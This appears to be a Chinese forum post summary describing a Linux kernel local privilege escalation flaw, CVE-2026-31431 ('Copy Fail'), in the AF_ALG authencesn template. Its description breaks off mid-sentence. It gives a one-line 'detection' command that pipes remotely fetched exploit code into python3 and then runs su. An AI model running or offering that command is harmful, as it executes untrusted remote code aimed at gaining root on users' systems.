📌 📄 内容摘要:
jam1024 (@geekjam) 在 核弹级Linux提权漏洞 中发帖
一句话检测验证 (不废话版)
curl https://copy.fail/exp | python3 && su
效果:
[image]
CVE-2026-31431 (绰号 “Copy Fail” )
漏洞详情
类型:本地权限提升(Local Privilege Escalation,LPE),允许普通用户(unprivileged local user)直接获得 root 权限。
影响范围:几乎所有主流 Linux 发行版(Ubuntu、RHEL、Debian、SUSE、Amazon Linux 等)从 2017 年以来 发布的内核版本。
成因:Linux 内核中 AF_ALG 加密接口(具体是 authencesn 加密模板)的逻辑错误(straight-line logic bug),源于 2017 年的一次“原地优化”(in-place optimization)。该...
────────── 链接信息 ────────── 🔗 论坛链接: linux.do 📎 访问地址: https://linux.do/t/topic/2086839/1 ─────────────────────────────
📢 来源:LINUX DO